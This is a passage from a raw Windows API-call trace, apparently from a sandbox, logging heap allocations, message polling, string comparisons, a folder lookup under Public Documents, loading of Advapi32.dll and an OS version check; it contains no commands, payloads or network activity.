hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0267.165] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0267.165] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.165] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0267.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0267.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0267.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0267.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0267.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0267.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0267.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0267.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Music", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Music", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Music", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0267.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0267.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0267.167] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0267.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0267.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0267.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0267.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0267.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0267.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0267.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0267.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0267.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0267.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0267.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0267.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x12) returned 0x2466df0 [0267.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0267.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Music", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Music", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Music", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0267.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0267.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0267.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0267.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0267.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0267.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0267.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0267.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0267.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0267.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0267.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0267.169] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0267.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0267.169] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0267.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0267.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0267.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0267.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c08 [0267.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0267.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0267.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0267.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0267.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0267.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0267.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0267.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0267.170] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0267.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0267.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0267.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0267.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0267.170] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0267.170] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.170] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0267.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.171] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0267.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.171] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0267.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.171] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0267.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.171] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents/My Music", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x131bc, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 0xaa58e0 [0267.171] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0267.172] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.172] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0267.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.172] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0267.172] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0267.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0267.173] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0267.173] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.173] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0267.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0267.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.173] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.173] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0267.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0267.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0267.174] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.174] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.174] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0267.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0267.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0267.174] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.174] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0267.175] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0267.175] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0267.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.175] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0267.175] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0267.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0267.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0267.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.175] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0267.176] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.176] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0267.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0267.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.176] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.176] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.176] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.176] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0267.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0267.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.176] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0267.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0267.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8f8 [0267.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0267.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0267.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0267.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0267.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0267.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0267.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.178] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, 